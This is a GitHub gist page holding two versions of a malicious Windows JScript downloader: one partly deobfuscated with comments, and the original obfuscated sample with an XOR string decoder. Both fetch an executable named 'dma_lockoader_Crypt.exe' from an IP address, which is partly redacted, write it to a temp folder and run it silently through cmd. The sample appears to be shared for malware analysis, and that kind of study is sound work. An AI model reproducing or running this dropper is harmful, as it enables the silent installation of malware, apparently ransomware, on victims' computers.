Created
May 26, 2016 16:00
-
-
Save benediktkr/661d841c2f44a6fb73cc67162e5f94b1 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function mae(a, b) { | |
| return a["charAt"](b); | |
| } | |
| function bfQh(a, b) { | |
| return a["charCodeAt"](b); | |
| } | |
| function pulPiZ(arg) { | |
| var ret = ''; | |
| var b = 0; | |
| var kRWy = 16; | |
| var a = 0; | |
| var c = ""; | |
| var arglen = arg["length"]; | |
| while (a < arglen - 2) { | |
| var kZBj = mae(arg, a+1); | |
| var oGArHMFB = mae(arg, a + 2); | |
| var UZhuo = mae(arg, a); | |
| c = UZhuo + kZBj + oGArHMFB; | |
| var slzWAuUC = mae(arg, a); | |
| var pJBpl = mae(arg, a + 1); | |
| var sHaA102 = (pJBpl == 0); | |
| if (slzWAuUC == 0) { | |
| var AUrzcM = a + 1; | |
| var UeZuaAO = a + 2; | |
| var dfkNGzYr = mae(arg, UeZuaAO); | |
| c = mae(arg, AUrzcM) + dfkNGzYr; | |
| } | |
| var zJDsIeP = mae(arg, a); | |
| var sHaA101 = (zJDsIeP == 0); | |
| if (sHaA101 && sHaA102) { | |
| var vVYvpZVe = a + 2; | |
| c = mae(arg, vVYvpZVe); | |
| } | |
| b = parseInt('' + c + ''); | |
| var ZjfMQFLi = a / 3; | |
| var kRWDz = ZjfMQFLi % kRWy; | |
| var sHaA = bfQh("xFEGFtIIPWGLjxLU", kRWDz); | |
| b = b ^ sHaA; | |
| var cuLYt = "fromCharCode"; | |
| var otds = String; | |
| ret = ret + otds[cuLYt](b); | |
| var cCtOt = 3; | |
| a = a + cCtOt; | |
| } | |
| return ret; | |
| } | |
| function kfiqi() { | |
| // REPLACED | |
| //return pulPiZ("0160500 [CUTOFF] 035105041018029"); | |
| return "http://[REDACTED]].103/dma_lockoader_Crypt.exe"; | |
| } | |
| function JuCGKb() { | |
| // REPLACED | |
| //var hUfEsMI = pulPiZ("047021038053047004061"); // WScript | |
| return eval("WScript"); | |
| } | |
| function ZtK() { | |
| // REPLACED | |
| // return pulPiZ("053021029010010070103017029027015024062040"); | |
| return "MSXML2.XMLHTTP"; | |
| } | |
| function egZCZZ(a, b, c) { | |
| } | |
| function GMU(rtwjdld, kdkndmd) {} | |
| function JqyQ() { | |
| var wscripteval = eval("WScript"); | |
| var scriptfullname = wscripteval["ScriptFullName"]; | |
| var activex_object = new ActiveXObject("MSXML2.XMLHTTP"); | |
| activex_object["send"](); | |
| if (typeof WScript["echo"] == "unknown") { | |
| activex_object.open("GET", "http://[REDACTED].103/dma_lockoader_Crypt.exe", 0); | |
| } | |
| var fsobj = new ActiveXObject("Scripting.FileSystemObject"); | |
| if (activex_object.Status == 200) { | |
| var adodb_stream = new ActiveXObject("ADODB.Stream"); | |
| var path_probably = fsobj.GetSpecialFolder(2) + '\\' + fsobj.GetTempName(); | |
| adodb_stream.Open(); | |
| adodb_stream.Type = 1; | |
| var wscript_shell = new ActiveXObject("WScript.Shell"); | |
| adodb_stream.Write(activex_object.ResponseBody); | |
| adodb_stream.Position = 0; | |
| adodb_stream.SaveToFile(path_probably); | |
| adodb_stream.Close(); | |
| wscript_shell.run("cmd /c " + path, 0); | |
| } | |
| GMU(fsobj, scriptfullname); | |
| } | |
| try { | |
| if (typeof WScript.BuildVersion == "number") JqyQ(); | |
| } catch (LflDlT) {} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function bCCg() { | |
| var ZRZQ = [(9), "f", 4][1]; | |
| return ZRZQ; | |
| } | |
| function hiz() { | |
| var PlrRRY = [3, "r", 6][1]; | |
| return PlrRRY; | |
| } | |
| function ekYr() { | |
| qnem = "C"; | |
| var CtcTS = [4, qnem, 5][1]; | |
| return CtcTS; | |
| } | |
| function vXM() { | |
| var xmTiX = (4671, 4197, 5917, 7204, 3580, 7052, 7114, 9765, 9082, 9861, "A"); | |
| return xmTiX; | |
| } | |
| function CfK() { | |
| var CjYK = (9299, 6662, 8019, 8743, 5179, 5958, 4605, 3648, 7468, 7969, "o"); | |
| return CjYK; | |
| } | |
| function UHRF() { | |
| var nLie = "c"; | |
| return nLie; | |
| } | |
| function prLEsog() { | |
| var ZFAkXrc = "a"; | |
| return ZFAkXrc; | |
| } | |
| function xoHWF() { | |
| var GFpIyicW = "e"; | |
| return GFpIyicW; | |
| } | |
| function gDdoZa() { | |
| var WeseG = "h"; | |
| return WeseG; | |
| } | |
| function bCg() { | |
| var crKqdT = [ | |
| [parseInt][0] | |
| ][0]; | |
| return crKqdT; | |
| } | |
| function ObtGHk(jUwTO) { | |
| var OSaodX = [(bCg())][0](jUwTO); | |
| return OSaodX; | |
| } | |
| function YWzqkGP() { | |
| var fTnKjVj = [UHRF() + "h" + prLEsog() + hiz()]; | |
| var YfMUj = [ekYr() + CfK() + "d" + xoHWF() + "A" + "t"]; | |
| var ZQGc = fTnKjVj[0] + YfMUj[0]; | |
| return ZQGc; | |
| } | |
| function VxEBjL() { | |
| var rslk = [UHRF() + gDdoZa() + prLEsog() + hiz() + vXM() + "t"]; | |
| var ZcPofNV = rslk[0]; | |
| return ZcPofNV; | |
| } | |
| function mae(IXZnZ, wSCDq) { | |
| var HiVQe = IXZnZ[VxEBjL()](wSCDq); | |
| return HiVQe; | |
| } | |
| function bfQh(GTTYl, TIW) { | |
| var ickU = GTTYl[YWzqkGP()](TIW); | |
| return ickU; | |
| } | |
| function EilkPvf(OZFMeh) { | |
| var uZVkFXsW = [bCCg(), hiz(), CfK(), "m", ekYr(), "h", prLEsog(), hiz(), ekYr(), CfK(), "d", xoHWF()]; | |
| return uZVkFXsW[OZFMeh]; | |
| } | |
| function rFeBmU() { | |
| var EheDj = EilkPvf(0) + EilkPvf(1) + EilkPvf(2) + EilkPvf(3) + EilkPvf(4) + EilkPvf(5) + EilkPvf(6) + EilkPvf(7) + EilkPvf(8) + EilkPvf(9) + EilkPvf(10) + EilkPvf(11); | |
| return EheDj; | |
| } | |
| function hrO(EaKewDG, TfG) { | |
| var RpHMAoVv = EaKewDG % TfG; | |
| return RpHMAoVv; | |
| } | |
| function AAONAS(YFYcyGY, vYM) { | |
| var ZAnb = YFYcyGY ^ vYM; | |
| return ZAnb; | |
| } | |
| function BYQ(cUm) { | |
| var hYfhUqM = cUm / 3; | |
| return hYfhUqM; | |
| } | |
| function QvRbFH() { | |
| var JJinQnRa = "gth"; | |
| return JJinQnRa; | |
| } | |
| function LuOqz() { | |
| var JpOw = ["l" + xoHWF() + "n" + QvRbFH()][0]; | |
| return JpOw; | |
| } | |
| function DtAL(uTJ) { | |
| var crlhqMu = uTJ + 1; | |
| return crlhqMu; | |
| } | |
| function pulPiZ(ViZTp) { | |
| var xCqDJ = ''; | |
| var TwcD = 0; | |
| var kRWy = "xFEGFtIIPWGLjxLU" [LuOqz()]; | |
| var XFrmuNc = 0; | |
| var enEuZZ = ""; | |
| var xBdalnU = ViZTp[LuOqz()]; | |
| while (XFrmuNc < xBdalnU - 2) { | |
| var pxNzoKY = [(0)][(0)]; | |
| var HDoUYcWv = DtAL(XFrmuNc); | |
| var kZBj = mae(ViZTp, HDoUYcWv); | |
| var oGArHMFB = mae(ViZTp, XFrmuNc + 2); | |
| var UZhuo = mae(ViZTp, XFrmuNc); | |
| enEuZZ = UZhuo + kZBj + oGArHMFB; | |
| var slzWAuUC = mae(ViZTp, XFrmuNc); | |
| var pJBpl = mae(ViZTp, XFrmuNc + 1); | |
| var sHaA102 = (pJBpl == 0); | |
| if (slzWAuUC == pxNzoKY) { | |
| var AUrzcM = XFrmuNc + 1; | |
| var UeZuaAO = XFrmuNc + 2; | |
| var dfkNGzYr = mae(ViZTp, UeZuaAO); | |
| enEuZZ = mae(ViZTp, AUrzcM) + dfkNGzYr; | |
| } | |
| var zJDsIeP = mae(ViZTp, XFrmuNc); | |
| var sHaA101 = (zJDsIeP == 0); | |
| if (sHaA101 && sHaA102) { | |
| var vVYvpZVe = XFrmuNc + 2; | |
| enEuZZ = mae(ViZTp, vVYvpZVe); | |
| } | |
| TwcD = ObtGHk('' + enEuZZ + ''); | |
| var ZjfMQFLi = BYQ(XFrmuNc); | |
| var kRWDz = hrO(ZjfMQFLi, kRWy); | |
| var sHaA = bfQh("xFEGFtIIPWGLjxLU", kRWDz); | |
| TwcD = AAONAS(TwcD, sHaA); | |
| var cuLYt = rFeBmU(); | |
| var otds = String; | |
| xCqDJ = xCqDJ + otds[cuLYt](TwcD); | |
| var cCtOt = 3; | |
| XFrmuNc = XFrmuNc + cCtOt; | |
| } | |
| return xCqDJ; | |
| } | |
| function kfiqi() { | |
| var cfTGx = "016050049055124091102120103099105125088079098100073116107118118071102045061054024032005027039058025034032053025055059048032035105041018029"; | |
| var aQpTN = pulPiZ(cfTGx); | |
| return aQpTN; | |
| } | |
| function JuCGKb() { | |
| var ENebVa = "047021038053047004061"; | |
| var hUfEsMI = pulPiZ(ENebVa); | |
| var NoozWk = [1, (eval(hUfEsMI)), 2][1]; | |
| return NoozWk; | |
| } | |
| function ZtK() { | |
| var kfavQ = "053021029010010070103017029027015024062040"; | |
| var XRZE = pulPiZ(kfavQ); | |
| return XRZE; | |
| } | |
| function GMU(rtwjdld, kdkndmd) {} | |
| function egZCZZ(tuiyo, fmmd, kemn) { | |
| if (typeof WScript[pulPiZ("029037045040")] == "unknown") { | |
| tuiyo[pulPiZ("023054032041")](fmmd, kemn, 0); | |
| } | |
| } | |
| function Wsohxwy(str) { | |
| str[pulPiZ("059042042052035")](); | |
| } | |
| function ehbGNL(rety, serq) { | |
| var wjSLfzHN = "027043033105035012044105127052103"; | |
| var IVJzl = pulPiZ(wjSLfzHN) + rety; | |
| serq[pulPiZ("010051043")](IVJzl, 0); | |
| } | |
| function WLaGPH(ferqw, ertyu) { | |
| var pBDcjKX = 0; | |
| ferqw[pulPiZ("040041054046050029038039")] = pBDcjKX; | |
| ferqw[pulPiZ("043039051034018027015032060050")](ertyu); | |
| } | |
| function JqyQ() { | |
| var ppbXQ = ZtK(); | |
| var menipxg = JuCGKb(); | |
| var wKrf = menipxg[pulPiZ("043037055046054000015060060059009045007029")]; | |
| var bFQKUrn = kfiqi(); | |
| var AYUPnkRl = new ActiveXObject(ppbXQ); | |
| var CTeFZX = "057002010003004090026061034050038033"; | |
| var FyeT = pulPiZ(CTeFZX); | |
| var wCPk = "063003017"; | |
| var tqNANxS = pulPiZ(wCPk); | |
| egZCZZ(AYUPnkRl, tqNANxS, bFQKUrn); | |
| var RfHjqM = "011035043035"; | |
| var cTyTEtkR = pulPiZ(RfHjqM); | |
| AYUPnkRl[cTyTEtkR](); | |
| var MCej = "043037055046054000032039055121001037006029031044011050032042009022035044051035"; | |
| var LQkBe = pulPiZ(MCej); | |
| var squYO = new ActiveXObject(LQkBe); | |
| if (AYUPnkRl[pulPiZ("043050036051051007")] == 200) { | |
| var RvSiis = new ActiveXObject(FyeT); | |
| var GlPIeoBI = '\\' + squYO[pulPiZ("063035049019035025057007049058034")](); | |
| var MAXyqiZ = squYO[pulPiZ("063035049020054017042032049059001035006028041039")](2) + GlPIeoBI; | |
| RvSiis[pulPiZ("055054032041")](); | |
| var WURvCFb = "047021038053047004061103003063034032006"; | |
| var DrLYqA = pulPiZ(WURvCFb); | |
| RvSiis[pulPiZ("044063053034")] = 1; | |
| var hVppeI = new ActiveXObject(DrLYqA); | |
| var KTatY = AYUPnkRl[pulPiZ("042035054055041026058044018056035053")]; | |
| RvSiis[pulPiZ("047052044051035")](KTatY); | |
| WLaGPH(RvSiis, MAXyqiZ); | |
| Wsohxwy(RvSiis); | |
| ehbGNL(MAXyqiZ, hVppeI); | |
| } | |
| GMU(squYO, wKrf); | |
| } | |
| try { | |
| if (typeof WScript.BuildVersion == "number") JqyQ(); | |
| } catch (LflDlT) {}% |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment